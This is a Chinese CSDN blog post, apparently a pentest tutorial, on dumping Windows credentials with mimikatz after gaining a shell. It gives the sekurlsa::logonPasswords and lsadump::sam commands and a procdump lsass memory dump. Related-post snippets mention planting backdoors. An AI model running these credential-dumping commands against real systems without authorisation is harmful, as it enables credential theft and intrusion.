mimikatz读取用户密码

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量1.7w 收藏 19
点赞数 2
文章标签: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40709439/article/details/82854536
版权

当我们getshell之后,一般是提权拿下远程服务器,刚学习了一个直接读取远程服务器的密码的工具mimikatz

首先先利用 privilege::debug 提生权限

 sekurlsa::logonPasswords就是抓取密码

这是我本机的,空密码

 

另外当无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码

procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件

把lsass.dmp放在mimikatz目录利用

 这样就读出了密码的sha1加密的密码

莫者
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4263
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6561
Windows系统使用两种算法对用户密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
mimikatz工具的介绍和基本使用
菜鸟-宇的个人博客
10-02 1317
该模块是用于提权的模块。mimikatz 很多模块需要高权限运行,因此执行高权限操作模块的时候需要先利用 privilege 模块进行提权。如下命令是用于提权的命令,只能用具有管理员权限的窗口执行该命令才能成功,普通用户权限执行该提权命令会失败。
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 1796
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
mimikatz常见命令
G3et的博客
01-29 1445
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
Mimikatz介绍
#7的博客
03-26 1417
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
mimikatz密码读取.zip
04-16
mimikatz用户密码提取技术详解》 在网络安全领域,密码的获取与保护是至关重要的环节。本文将深入探讨一种名为mimikatz的工具,它在密码读取方面有着广泛的应用。mimikatz是由法国安全研究员Benjamin Delpy开发...
mimikatz获取系统密码
03-28
1. **LSA Secrets**: mimikatz可以读取本地安全授权(LSA)的秘密,包括本地账户的明文密码、NTLM哈希以及域控制器的信息。这些秘密存储在LSASS进程中,通过`sekurlsa::logonpasswords`命令可以提取。 2. **DPAPI**...
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
一键获取windows密码神器mimikatz咪咪猫
07-23
- **windows密码**:Mimikatz的主要功能之一就是从Windows系统中提取密码,包括用户登录密码、LSA(Local Security Authority)秘密和域凭据等。 - **windows安全**:Mimikatz的存在是为了提高Windows系统的安全性,...
Mimikatz Windows 密码抓取神器
05-27
Mimikatz 可以直接从LSA的内存中读取未加密的密码数据,包括用户登录密码、域控制器的NTLM哈希以及 Kerberos TGT(Ticket Granting Ticket)。 2. **Kerberos凭证管理**:Mimikatz 支持提取和利用Kerberos凭据,...
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
内网渗透之某后渗透利用【网络安全】
kali_Ma的博客
03-23 3293
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1937
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7007
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
Mimikatz 学习ing.....
qq_40624810的博客
07-07 453
背景 今天老大问我拿到内网一台机器,怎么知道用户密码。我自然不会,老大就让我了解Mimikatz这个工具。于是学习到这个直接读取远程服务器的密码的工具mimikatz Mimikatz mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,这是我除了zywoo知道的第二个法国人了。它具备很多功能,其中最亮的功能是直接从lsass.exe 进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存
mimikatz使用
mirror97black的博客
04-11 6894
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
【源码阅读】Mimikatz相关资料
weixin_30843605的博客
01-25 310
Mimikatz GitHub (源码) https://github.com/gentilkiwi/mimikatz Mimikatz GitHub Wiki (包含了一些说明文档) https://github.com/gentilkiwi/mimikatz/wiki GentilKiwi Blog (博客里的大多数内容是用法语写的,请使用 Chrome 浏览器进行自动翻译) ht...
mimikatz提取文件中的用户名和密码
只有不断学习才不会被茫茫人海淹没!
05-12 605
切换到文件位置 输入命令提取: lsadump::sam /sam:SAM /system:SYSTEM
mimikatz 读取 win10密码
03-16
Mimikatz是一款用于读取Windows系统密码的工具,可以在Win10系统中使用。它可以通过抓取系统内存中的密码信息,或者直接读取系统中的密码哈希值,来获取用户的登录密码。但是需要注意的是,使用Mimikatz读取他人密码是非法的行为,应该遵守相关法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值